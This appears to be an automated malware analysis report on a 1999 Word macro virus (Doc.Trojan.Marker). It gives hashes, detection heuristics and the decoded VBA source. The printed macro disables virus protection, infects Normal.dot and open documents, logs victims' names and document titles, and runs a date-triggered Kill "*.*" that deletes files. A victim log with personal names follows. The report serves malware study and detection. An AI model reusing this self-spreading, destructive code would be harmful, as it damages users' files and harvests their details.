Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 180cce89269c027f…

MALICIOUS

Office (OLE)

48.0 KB Created: 1999-04-02 06:35:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 297729181baf3c56f9ecd2ecb3654675 SHA-1: ed1414195bdcca6acb831e7e3b75df9e5ca09d8f SHA-256: 180cce89269c027f1ffd8076ca37af65ac2d160529e2b4d70bdc3afe010e51a0
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV and contains VBA macros. The macro code attempts to infect the Normal.dot template by copying its own code into it. The macro also contains a conditional payload that executes on February 22nd, which includes a 'Kill *.*' command, indicating a destructive intent. The presence of legacy WordBasic auto-exec markers further suggests a malicious document.

Heuristics 3

  • ClamAV: Doc.Trojan.Marker-24 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-24
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16006 bytes
SHA-256: b21dd67f680cdc37c584af8039974f852a80031f7684684feb8ca9cee051ea6b
Detection
ClamAV: Doc.Trojan.Marker-24
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Document_Close()

On Error Resume Next

Const Murder = "<-- Its Murder!!"

'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim rep As Integer
Dim virusCode, UserAddress, LogData, LogFile As String

'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.codemodule.Find(Murder, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.codemodule.Find(Murder, 1, 1, 10000, 10000)

'Switch the VirusProtection OFF
Options.VirusProtection = False
Options.SaveNormalPrompt = False



'PayLoad
Delivery:
If Day(Now()) = 22 And Month(Now()) = 2 Then
       Kill "*.*":
       rep = MsgBox("That's Right", vbOK + vbCritical, "It's Murder")
       GoTo Delivery
       End If
       
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   


'.......................................................................................
  'Infect the NormalTemplate
  If DocumentInfected = True Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
  virusCode = ad.codemodule.Lines(1, ad.codemodule.countoflines)
    'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i

    LogData = Chr(13) & _
              "' " & Format(Time, "hh:mm:ss AMPM -") & _
                     Format(Date, "dddd,d mmm,yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & Application.UserAddress & Chr(13) & _
              "' " & Application.ActiveDocument & Chr(13)
              
              
    virusCode = virusCode & LogData
   

    nt.codemodule.DeleteLines 1, nt.codemodule.countoflines
    nt.codemodule.AddFromString virusCode
    
    If SaveNormalTemplate = True Then NormalTemplate.Save
    
 
End If



'..........................................................................................
  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
  
    SaveDocument = ActiveDocument.Saved
    
    virusCode = nt.codemodule.Lines(1, nt.codemodule.countoflines)

    ad.codemodule.DeleteLines 1, ad.codemodule.countoflines
    ad.codemodule.AddFromString virusCode
    
    If SaveDocument = True Then ActiveDocument.Save
      
  End If
  
    End If



End Sub


' Potential Murder Victims  "Marked for death...If I kiss you now, you'll probably die later..."
'

' 12:00:00 AM -Thursday,6 May,1999
' Ryde or Die
' The world
' ThE GeNiUs.doc

' 06:27:03 PM -Thursday,6 May,1999
' Valued Gateway Customer
'
' 1st Trial.doc



' 10:10:56 AM -Friday,7 May,1999
' Valued Gateway Customer
'
' 1st Trial.doc



' 02:33:34 PM -Saturday,8 May,1999
' Matthew E. Dawson
'
' Psychology paper.doc



' 08:17:21 PM -Wednesday,12 May,1999
' administrator
'
' str.doc



' 05:03:30  -Tuesday,6 Jul,1999
' VANDAMME CHRISTOPHE
'
' cv-0699.doc



' 01:24:15  -Wednesday,7 Jul,1999
' DUFLOT Jean Marc
'
' AUG-CCB-1.doc



' 03:52:40  -Friday,9 Jul,1999
' von Erlach Burkhart
'
' LETCOMV6.doc



' 03:54:51  -Tuesd
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.